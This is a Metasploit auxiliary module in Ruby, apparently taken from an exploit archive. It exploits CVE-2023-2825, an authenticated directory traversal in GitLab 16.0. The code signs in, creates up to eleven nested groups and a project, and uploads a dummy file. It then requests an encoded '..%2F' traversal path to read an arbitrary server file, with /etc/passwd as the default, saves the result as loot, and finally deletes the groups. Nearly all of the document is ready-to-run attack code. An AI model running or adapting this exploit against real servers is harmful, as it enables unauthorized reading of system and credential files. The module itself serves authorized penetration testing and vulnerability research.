## https://sploitus.com/exploit?id=PACKETSTORM:180683
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::Gitlab
include Msf::Auxiliary::Report
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'GitLab Authenticated File Read',
'Description' => %q{
GitLab version 16.0 contains a directory traversal for arbitrary file read
as the `gitlab-www` user. This module requires authentication for exploitation.
In order to use this module, a user must be able to create a project and groups.
When exploiting this vulnerability, there is a direct correlation between the traversal
depth, and the depth of groups the vulnerable project is in. The minimum for this seems
to be 5, but up to 11 have also been observed. An example of this, is if the directory
traversal needs a depth of 11, a group
and 10 nested child groups, each a sub of the previous, will be created (adding up to 11).
Visually this looks like:
Group1->sub1->sub2->sub3->sub4->sub5->sub6->sub7->sub8->sub9->sub10.
If the depth was 5, a group and 4 nested child groups would be created.
With all these requirements satisfied a dummy file is uploaded, and the full
traversal is then executed. Cleanup is performed by deleting the first group which
cascades to deleting all other objects created.
},
'Author' => [
'h00die', # MSF module
'pwnie', # Discovery on HackerOne
'Vitellozzo' # PoC on Github
],
'References' => [
['URL', 'https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/'],
['URL', 'https://github.com/Occamsec/CVE-2023-2825'],
['URL', 'https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/'],
['CVE', '2023-2825']
],
'DisclosureDate' => '2023-05-23',
'License' => MSF_LICENSE,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options(
[
OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
OptString.new('PASSWORD', [true, 'The password for the specified username', nil]),
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal (also groups creation)', 11]),
OptString.new('FILE', [true, 'File to read', '/etc/passwd'])
]
)
deregister_options('GIT_URI')
end
def get_csrf(body)
if body.empty?
fail_with(Failure::UnexpectedReply, "HTML response had an empty body, couldn't find CSRF, unable to continue")
end
body =~ /"csrf-token" content="([^"]+)"/
if ::Regexp.last_match(1).nil?
fail_with(Failure::UnexpectedReply, 'CSRF token not found in response, unable to continue')
end
::Regexp.last_match(1)
end
def check
# check method almost entirely borrowed from gitlab_github_import_rce_cve_2022_2992
@cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD'])
raise Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError if @cookie.nil?
vprint_status('Trying to get the GitLab version')
version = Rex::Version.new(gitlab_version)
if version != Rex::Version.new('16.0.0')
return CheckCode::Safe("Detected GitLab version #{version} which is not vulnerable")
end
report_vuln(
host: rhost,
name: name,
refs: references,
info: [version]
)
return Exploit::CheckCode::Appears("Detected GitLab version #{version} which is vulnerable.")
rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError
return Exploit::CheckCode::Detected('Could not detect the version because authentication failed.')
rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::ClientError => e
return Exploit::CheckCode::Unknown("#{e.class} - #{e.message}")
end
def run
if datastore['DEPTH'] < 5
print_bad('A DEPTH of < 5 is unlikely to succeed as almost all observed installs require 5-11 depth.')
end
begin
@cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) if @cookie.nil?
rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError
fail_with(Failure::NoAccess, 'Unable to authenticate, check credentials')
end
fail_with(Failure::NoAccess, 'Unable to retrieve cookie') if @cookie.nil?
# get our csrf token
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200
csrf_token = get_csrf(res.body)
vprint_good("CSRF Token: #{csrf_token}")
# create nested groups to the appropriate depth
print_status("Creating #{datastore['DEPTH']} groups")
parent_id = ''
first_group = ''
(1..datastore['DEPTH']).each do |_|
name = Rex::Text.rand_text_alphanumeric(8, 10)
if first_group.empty?
first_group = name
vprint_status("Creating group: #{name}")
else
vprint_status("Creating child group: #{name} with parent id: #{parent_id}")
end
# a success will give a 302 and direct us to /<group_name>
res = send_request_cgi!({
'uri' => normalize_uri(target_uri.path, 'groups'),
'method' => 'POST',
'vars_post' => {
'group[parent_id]' => parent_id,
'group[name]' => name,
'group[path]' => name,
'group[visibility_level]' => 20,
'user[role]' => 'software_developer',
'group[jobs_to_be_done]' => '',
'authenticity_token' => csrf_token
}
})
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200
csrf_token = get_csrf(res.body)
vprint_good("CSRF Token: #{csrf_token}")
# grab our parent group ID for nesting
res.body =~ /data-clipboard-text="([^"]+)" type="button" title="Copy group ID"/
parent_id = ::Regexp.last_match(1)
fail_with(Failure::UnexpectedReply, "#{peer} - Cannot retrieve the parent ID from the HTML response") unless parent_id
end
# create a new project
project_name = Rex::Text.rand_text_alphanumeric(8, 10)
print_status("Creating project #{project_name}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'projects'),
'method' => 'POST',
'vars_post' => {
'project[ci_cd_only]' => 'false',
'project[name]' => project_name,
'project[selected_namespace_id]' => parent_id,
'project[namespace_id]' => parent_id,
'project[path]' => project_name,
'project[visibility_level]' => 20,
'project[initialize_with_readme]' => 1, # The POC is missing a ] here, fingerprintable?
'authenticity_token' => csrf_token
}
})
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 302
project_id = URI(res.headers['Location']).path
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, project_id)
})
csrf_token = get_csrf(res.body)
# upload a dummy file
print_status('Creating a dummy file in project')
file_name = Rex::Text.rand_text_alphanumeric(8, 10)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, project_id, 'uploads'),
'method' => 'POST',
'headers' => {
'X-CSRF-Token' => csrf_token,
'Accept' => '*/*' # required or you get a 404
},
'vars_form_data' => [
{
'name' => 'file',
'filename' => file_name,
'data' => Rex::Text.rand_text_alphanumeric(4, 25)
}
]
})
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 200
res = res.get_json_document
file_url = res.dig('link', 'url')
if file_url.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to determine file upload URL, possible permissions issue")
end
# remove our file name
file_url = file_url.gsub("/#{file_name}", '')
# finally, read our file
print_status('Executing dir traversal')
target_file = datastore['FILE']
target_file = target_file.gsub('/', '%2F')
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, project_id, file_url, '..%2F' * datastore['DEPTH'] + "..#{target_file}"),
'headers' => {
'Accept' => '*/*' # required or you get a 404
}
})
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
if res.code == 500
print_error("Unable to read file (permissions, or file doesn't exist)")
elsif res.code != 200
print_error("#{peer} - Unexpected response code (#{res.code})") # don't fail_with so we can cleanup
end
if res.body.empty?
print_error('Response has 0 size.')
elsif res.code == 200
print_good(res.body)
loot_path = store_loot('GitLab file', 'text/plain', datastore['RHOST'], res.body, datastore['FILE'])
print_good("#{datastore['FILE']} saved to #{loot_path}")
else
print_error('Bad response, initiating cleanup')
end
# deleting the first group will delete the sub-groups and project
print_status("Deleting group #{first_group}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, first_group),
'method' => 'POST',
'vars_post' => {
'authenticity_token' => csrf_token,
'_method' => 'delete'
}
})
fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 302
end
end